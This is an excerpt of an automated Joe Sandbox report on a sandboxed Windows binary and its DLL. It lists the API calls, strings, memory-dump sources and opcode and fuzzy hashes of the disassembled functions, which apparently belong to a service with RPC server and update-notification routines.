                                  • Instruction Fuzzy Hash: A9214FACF0E64245FB69AF31D6A113B53429F447B0F546734E93E67AC6EE2CB4419E00
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                  • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                  • String ID: CONOUT$
                                  • API String ID: 3230265001-3130406586
                                  • Opcode ID: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                  • Instruction ID: 6a55b551aabb88951b322a06efbeda7f2883df03e2b1b0ab500bdc8f3d0da3d8
                                  • Opcode Fuzzy Hash: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                  • Instruction Fuzzy Hash: 47119675B18A4182E7508F62E94432673A0FB88BE4F409234EA5DA7F94CF3CD544CB44
                                  APIs
                                  • RegisterServiceCtrlHandlerW.ADVAPI32 ref: 0000000140001282
                                  • CreateEventW.KERNEL32 ref: 00000001400012C0
                                    • Part of subcall function 0000000140003F80: InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
                                    • Part of subcall function 0000000140003F80: GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
                                    • Part of subcall function 0000000140003F80: OpenProcessToken.ADVAPI32 ref: 0000000140004007
                                    • Part of subcall function 0000000140003F80: GetLastError.KERNEL32 ref: 0000000140004011
                                    • Part of subcall function 0000000140003F80: EnterCriticalSection.KERNEL32 ref: 00000001400040B3
                                    • Part of subcall function 0000000140003F80: LeaveCriticalSection.KERNEL32 ref: 000000014000412B
                                    • Part of subcall function 0000000140003F80: GetVersionExW.KERNEL32 ref: 0000000140004155
                                    • Part of subcall function 0000000140003F80: RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
                                    • Part of subcall function 0000000140003F80: RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
                                    • Part of subcall function 0000000140003F80: RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
                                    • Part of subcall function 0000000140003F80: RpcServerListen.RPCRT4 ref: 00000001400041D3
                                  • SetServiceStatus.ADVAPI32 ref: 0000000140001302
                                  • WaitForSingleObject.KERNEL32 ref: 0000000140001312
                                    • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
                                    • Part of subcall function 00000001400042B0: CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
                                    • Part of subcall function 00000001400042B0: SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
                                    • Part of subcall function 00000001400042B0: WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
                                    • Part of subcall function 00000001400042B0: TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
                                    • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
                                    • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
                                    • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
                                    • Part of subcall function 00000001400042B0: RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
                                    • Part of subcall function 00000001400042B0: RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
                                    • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
                                    • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
                                    • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
                                    • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
                                    • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
                                    • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
                                    • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6
                                  • SetServiceStatus.ADVAPI32 ref: 000000014000134B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$Server$CloseEnterHandleLeaveService$DeleteEventObjectProcessRegisterSingleStatusWait$CancelContextCreateCtrlCurrentDontErrorHandlerInitializeLastListenListeningMgmtOpenProtseqSerializeStopTerminateThreadTimerTokenUnregisterVersionWaitable
                                  • String ID: vseamps
                                  • API String ID: 3197017603-3944098904
                                  • Opcode ID: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                  • Instruction ID: 0252cca9582b7aeb0e5a7a434c8e7364f46e89616d8e728b6478e43ab65cb610
                                  • Opcode Fuzzy Hash: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                  • Instruction Fuzzy Hash: B921A2B1625A009AEB02DF17FC85BD637A0B74C798F45621AB7498F275CB7EC148CB00
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Messagesprintf_s
                                  • String ID: 10:52:57$Help$Jul 5 2019$usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy
                                  • API String ID: 2642950106-3610746849
                                  • Opcode ID: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                  • Instruction ID: 92f91a294e228129c374272f9a209b177778b3d46068e39525b46f8f62cf975d
                                  • Opcode Fuzzy Hash: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                  • Instruction Fuzzy Hash: 78F01DB1221A8595FB52EB61F8567D62364F78C788F811112BB4D0B6BADF3DC219C700
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$FreeProcess
                                  • String ID:
                                  • API String ID: 3859560861-0
                                  • Opcode ID: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                  • Instruction ID: 80974503ddc58818480ab649a73b779641f1d99de81085d1f592bfbfa5fc6ad1
                                  • Opcode Fuzzy Hash: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                  • Instruction Fuzzy Hash: 9C01EDB8701B8041EB0BDFE7B60839992A2AB8DFD5F185024AF1D17779DE3AC4548700
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$FreeProcess
                                  • String ID:
                                  • API String ID: 3859560861-0
                                  • Opcode ID: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                  • Instruction ID: 9f3d0c666f817a9e432213240f72880bf7997caebe097eb0308f7621ef9b933c
                                  • Opcode Fuzzy Hash: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                  • Instruction Fuzzy Hash: 20010CB9601B8081EB4BDFE7B608399A2A2FB8DFD4F089024AF0917739DE39C4548200
                                  APIs
                                  • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6E7
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6FD
                                  • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F72B
                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F799
                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F84C
                                  • GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F911
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: StringType$ByteCharMultiWide$ErrorLast
                                  • String ID:
                                  • API String ID: 319667368-0
                                  • Opcode ID: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                  • Instruction ID: 469d978012ccf723a2c6c682b25d7e2ba576a75483cbf286a89393a26fd70a6f
                                  • Opcode Fuzzy Hash: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                  • Instruction Fuzzy Hash: E3817EB2200B8096EB62DF27A4407E963A5F74CBE4F548215FB6D57BF4EB78C546A300
                                  APIs
                                  • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE38
                                  • GetLastError.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE4E
                                    • Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151
                                  • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AEDE
                                  • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF85
                                  • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF9C
                                  • GetStringTypeA.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AFFB
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
                                  • String ID:
                                  • API String ID: 1390108997-0
                                  • Opcode ID: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                  • Instruction ID: bb54969f148ae750ab4279c880304e23b66920be01f6227d0c0ffa95ca0b2e73
                                  • Opcode Fuzzy Hash: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                  • Instruction Fuzzy Hash: 1B616CB22007818AEB62DF66E8407E967E1F74DBE4F144625FF5887BE5DB39C9418340
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                   • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                  • String ID: csm$csm$csm
                                  • API String ID: 3523768491-393685449
                                  • Opcode ID: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                  • Instruction ID: dc06fb5fa9b71da989c45672d6d37ec08183d3f4ccbb6aac84278cfdd9f0e4e0
                                  • Opcode Fuzzy Hash: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                  • Instruction Fuzzy Hash: BCE1B1B6B097828AE7209F39D4803BE77A0FB45748F146135DE8D67A96CF38E581CB40
                                  APIs
                                  • GetLastError.KERNEL32(?,?,?,00007FFBC1BA8BC9,?,?,?,?,00007FFBC1BA8C14), ref: 00007FFBC1BA95CB
                                  • FlsSetValue.KERNEL32(?,?,?,00007FFBC1BA8BC9,?,?,?,?,00007FFBC1BA8C14), ref: 00007FFBC1BA9601
                                  • FlsSetValue.KERNEL32(?,?,?,00007FFBC1BA8BC9,?,?,?,?,00007FFBC1BA8C14), ref: 00007FFBC1BA962E
                                  • FlsSetValue.KERNEL32(?,?,?,00007FFBC1BA8BC9,?,?,?,?,00007FFBC1BA8C14), ref: 00007FFBC1BA963F
                                  • FlsSetValue.KERNEL32(?,?,?,00007FFBC1BA8BC9,?,?,?,?,00007FFBC1BA8C14), ref: 00007FFBC1BA9650
                                  • SetLastError.KERNEL32(?,?,?,00007FFBC1BA8BC9,?,?,?,?,00007FFBC1BA8C14), ref: 00007FFBC1BA966B
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                   • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Value$ErrorLast
                                  • String ID:
                                  • API String ID: 2506987500-0
                                  • Opcode ID: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                  • Instruction ID: 21491742607ee10a4d92690e5fe13e2d8aef9a86c079129b8e0a7a530d4233d5
                                  • Opcode Fuzzy Hash: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                  • Instruction Fuzzy Hash: AD115EACF0E64245FB58AF36D66113B23529F487B0F44A735E93E66AC6DE2CB441DE00
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CloseCriticalHandleSection$EnterEventLeaveObjectSingleWait
                                  • String ID:
                                  • API String ID: 3326452711-0
                                  • Opcode ID: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                  • Instruction ID: 377d3f5d57f943d14cdd7bc93d1ee7868a659259fbd0ecc80ccbf17849fffa4f
                                  • Opcode Fuzzy Hash: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                  • Instruction Fuzzy Hash: 71F00274611D05D5EB029F53EC953942362B79CBD5F590111EB0E8B270DF3A8599C705
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterLeaveTimerWaitable
                                  • String ID: amps_Exec: pHandle=%p, execId=%d, iParam=%d
                                  • API String ID: 2984211723-1229430080
                                  • Opcode ID: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                  • Instruction ID: 21f659f61b14fb79d6609d2ab4e2a3109e2b4daa988e78f6170daec752ad98bd
                                  • Opcode Fuzzy Hash: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                  • Instruction Fuzzy Hash: 2C311375614B4082EB228F56F890B9A7360F78CBE4F480225FB6C4BBB4DF7AC5858740
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                   • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: AddressFreeHandleLibraryModuleProc
                                  • String ID: CorExitProcess$mscoree.dll
                                  • API String ID: 4061214504-1276376045
                                  • Opcode ID: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                  • Instruction ID: b8405dae1435797d0b5e0b4166712639ce0708423d601e40ca541aabb3c088e8
                                  • Opcode Fuzzy Hash: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                  • Instruction Fuzzy Hash: DCF0C2A9B19A0281EB108F34E44433B6320AF88760F846335CA6D56AF4CF3DE149CB00
                                  APIs
                                  • GetModuleHandleA.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 000000014000851F
                                  • GetProcAddress.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 0000000140008534
                                  • ExitProcess.KERNEL32 ref: 0000000140008545
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: AddressExitHandleModuleProcProcess
                                  • String ID: CorExitProcess$mscoree.dll
                                  • API String ID: 75539706-1276376045
                                  • Opcode ID: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                  • Instruction ID: f47e7dafb9c87e29c0f228a4507f2bac89d7b1d3f8a3a9cfd33eb857191fa9e3
                                  • Opcode Fuzzy Hash: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                  • Instruction Fuzzy Hash: 3AE04CB0711A0052FF5A9F62BC947E823517B5DB85F481429AA5E4B3B1EE7D85888340
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                   • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: AdjustPointer
                                  • String ID:
                                  • API String ID: 1740715915-0
                                  • Opcode ID: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                  • Instruction ID: 2d58787c1e438a1a42ba65b87722c3ea6b3dad21c9fec87d242cc92b6ed0a40c
                                  • Opcode Fuzzy Hash: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                  • Instruction Fuzzy Hash: ACB1A0A9B0B74281EB65DF35D58023EA790EF54B84F0DA835DE4D27B95DE3CE4428B00
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: FileInfoSleepStartupType
                                  • String ID:
                                  • API String ID: 1527402494-0
                                  • Opcode ID: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                  • Instruction ID: 2708af0267d8365e54dad009941ca9060f987db411f69ca3ecc20d856229d7df
                                  • Opcode Fuzzy Hash: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                  • Instruction Fuzzy Hash: 68917DB260468085E726CB2AE8487D936E4A71A7F4F554726EB79473F1DA7EC841C301
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CommandLine$ByteCharErrorLastMultiWide
                                  • String ID:
                                  • API String ID: 3078728599-0
                                  • Opcode ID: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                  • Instruction ID: cab5f27f5268d67fa2b955b7a4895f7bd1e416bc4c6d53bc856f5ac88b27d897
                                  • Opcode Fuzzy Hash: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                  • Instruction Fuzzy Hash: 04316D72614A8082EB21DF52F80479A77E1F78EBD0F540225FB9A87BB5DB3DC9458B00
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
                                  • String ID:
                                  • API String ID: 1850339568-0
                                  • Opcode ID: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                  • Instruction ID: bea3f08d648c3b04eb316e4c6042deaac10e1fdf59f4257f2eabc448b4c653dc
                                  • Opcode Fuzzy Hash: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                  • Instruction Fuzzy Hash: 38317AB1214A4482EB12CF22F8403AA73A1F79D7E4F544315FB6A4BAF5DB7AC5859B00
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                   • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmp
